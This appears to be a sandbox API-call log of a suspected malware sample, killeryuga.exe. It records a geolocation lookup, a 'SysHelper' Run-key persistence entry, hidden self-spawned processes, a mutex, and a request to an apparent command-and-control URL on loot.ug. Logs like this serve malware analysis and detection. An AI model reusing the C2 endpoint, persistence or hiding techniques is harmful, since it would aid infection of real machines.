Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDateFormatEx, address_out = 0x753f6676 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoEx, address_out = 0x753e4751 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeFormatEx, address_out = 0x753f65f1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultLocaleName, address_out = 0x753e47c1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidLocaleName, address_out = 0x753e47e1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringEx, address_out = 0x753e47f1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentPackageId, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount64, address_out = 0x7537eee0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileInformationByHandleExW, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFileInformationByHandleW, address_out = 0x0 False 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, size = 260 True 1
Fn
Inet Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = https, server_name = api.2ip.ua, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /geo.json True 1
Fn
Inet Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = https://api.2ip.ua/geo.json True 1
Fn
Inet Read Response size = 10240, size_out = 554 True 1
Fn
Data
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Module Load module_name = kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumProcesses, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumProcessModules, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleBaseNameW, address_out = 0x0 False 1
Fn
Module Load module_name = Psapi.dll, base_address = 0x75460000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\psapi.dll, function = EnumProcesses, address_out = 0x75461544 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\psapi.dll, function = EnumProcessModules, address_out = 0x75461408 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\psapi.dll, function = GetModuleBaseNameW, address_out = 0x7546152c True 1
Fn
Process Enumerate Processes - True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, size = 1024 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run, value_name = SysHelper, data = "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe" --AutoStart, type = REG_EXPAND_SZ True 1
Fn
File Write size = 48 False 1
Fn
File Write size = 2 False 1
Fn
Process Create process_name = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, os_pid = 0x588, creation_flags = CREATE_DETACHED_PROCESS, CREATE_IDLE_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Fn
Mutex Create mutex_name = {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} True 1
Fn
Process Create process_name = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, os_pid = 0x5a4, creation_flags = CREATE_DETACHED_PROCESS, CREATE_IDLE_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Fn
User Get Username user_name_out = 5p5NrGJn0jS HALPmcxz True 1
Fn
Window Create window_name = LPCWSTRszTitle, class_name = LPCWSTRszWindowClass, wndproc_parameter = 0 True 1
Fn
Thread 0x4b4
63 8
»
Category Operation Information Success Count Logfile
Inet Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = http, server_name = loot.ug, server_port = 80 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /Asjhd4736578gUdhfsfy4983689q34hHSDfig56usdfloadold/get.php True 1
Fn
Inet Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://loot.ug/Asjhd4736578gUdhfsfy4983689q34hHSDfig56usdfloadold/get.php?pid=AE2BD2A0D8075FA76A58D68C2A4634E3 True 1
Fn
Inet Read Response size = 1024, size_out = 103 True 1
Fn
Data
Inet Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Thread 0x4e8
323 0
»
Category Operation Information Success Count Logfile
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Fn
Process Open desired_access = SYNCHRONIZE True 1
Fn
Thread 0x5b0
139 0
»
Category Operation Information Success Count Logfile
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Sleep duration = 1000 milliseconds (1.000 seconds) True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75eb5708 True 1
Fn
Module Load module_name = Shell32.dll, base_address = 0x75e30000 True 1
Fn
